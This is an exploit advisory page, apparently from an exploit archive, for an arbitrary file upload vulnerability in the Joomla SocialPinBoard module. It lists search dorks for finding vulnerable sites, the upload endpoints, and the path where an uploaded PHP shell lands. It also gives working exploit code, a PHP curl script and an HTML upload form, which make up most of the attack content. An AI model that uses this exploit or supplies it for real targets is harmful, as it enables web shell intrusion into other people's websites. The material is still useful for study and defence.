Joomla SocialPinBoard Arbitrary File Upload

2017.06.29
id Con7ext (ID) id
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

################################# #TItle: SocialPinBoard AFU (Arbitrary File Upload) #Author: Con7ext #Tested On Windows Xp And Linux Ubuntu #Dork: #inurl:/index.php?option=com_socialpinboard #Powered By Socialpinboard #index of /mod_socialpinboard_menu/ #index of /socialpinboard/ #inurl:/modules/ "Socialpinboard" ################################ Path Of Exploit: /modules/mod_socialpinboard_menu/saveimagefromupload.php Or modules/mod_socialpinboard_menu/upload-file.php Path Of Shell:/modules/mod_socialpinboard_menu/images/socialpinboard/temp/RANDOMresult.php Exploit (PHP): <?php $uploadfile="low.php"; $ch = curl_init("http://www.Con7ext-security.com/modules/mod_socialpinboard_menu/saveimagefromupload.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('uploadfile'=>"@$uploadfile"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> Exploit (HTML): <html> <body> <form method="POST" action="http://www.Con7ext-security.com/modules/mod_socialpinboard_menu/saveimagefromupload.php" enctype="multipart/form-data"> <input type="file" name="uploadfile" /><button>Upload</button> </form> </body> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top